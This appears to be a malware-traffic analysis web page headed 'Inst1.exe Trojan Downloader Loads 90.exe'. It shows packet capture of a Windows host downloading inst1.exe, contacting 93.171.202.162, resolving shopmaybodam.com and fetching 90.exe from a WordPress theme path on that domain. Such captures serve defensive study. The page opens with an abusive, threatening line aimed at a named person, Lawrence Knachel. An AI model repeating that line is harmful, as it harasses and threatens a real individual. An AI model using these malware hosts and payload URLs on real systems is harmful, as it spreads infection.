Text Example

LAWRENCE KNACHEL IS A TROGLYODYTE PIECE OF SH!T - 3600 VISITORS DAILY WILL KNOW YOUR DAY IS COMING SOON

Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download

Inst1.exe Trojan Downloader Loads 90.exe Unknown Malware PCAP file download

 

2016-09-20 09:02:11.821468 IP 192.168.1.102.59656 > 192.168.1.100.80: Flags [P.], seq 1:336, ack 1, win 256, length 335: HTTP: GET /captured/inst1.exe HTTP/1.1
E..w.[………f…d…P#7….U.P…….GET /captured/inst1.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Referer: http://192.168.1.100/captured/
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 192.168.1.100
Connection: Keep-Alive
2016-09-20 09:02:11.821487 IP 192.168.1.100.80 > 192.168.1.102.59656: Flags [.], ack 336, win 237, length 0

E..(.,….LH…f]….&..z..*/..;P… ………
2016-09-20 09:03:55.606661 IP 192.168.1.102.59686 > 93.171.202.162.443: Flags [.], ack 549660, win 2268, length 0
E..(.-….LG…f]….&..z..*/..EP………….
2016-09-20 09:03:55.886564 IP 192.168.1.102.62247 > 75.75.75.75.53: 40557+ A? shopmaybodam.com. (34)
E..>6……^…fKKKK.’.5.*…m………..shopmaybodam.com…..
2016-09-20 09:03:56.183757 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [S], seq 3854319646, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….z…fg.’e.’.P..@……. ..-…………..
2016-09-20 09:03:56.463188 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [.], ack 4258741258, win 256, length 0
E..(………..fg.’e.’.P..@…<
P………….
2016-09-20 09:03:56.463600 IP 192.168.1.102.59687 > 103.28.39.101.80: Flags [P.], seq 0:356, ack 1, win 256, length 356: HTTP: GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
E………. …fg.’e.’.P..@…<
P…….GET /wp-content/themes/twentyfifteen/genericons/90.exe HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.1; WIN32)
Host: shopmaybodam.com

Leave a Reply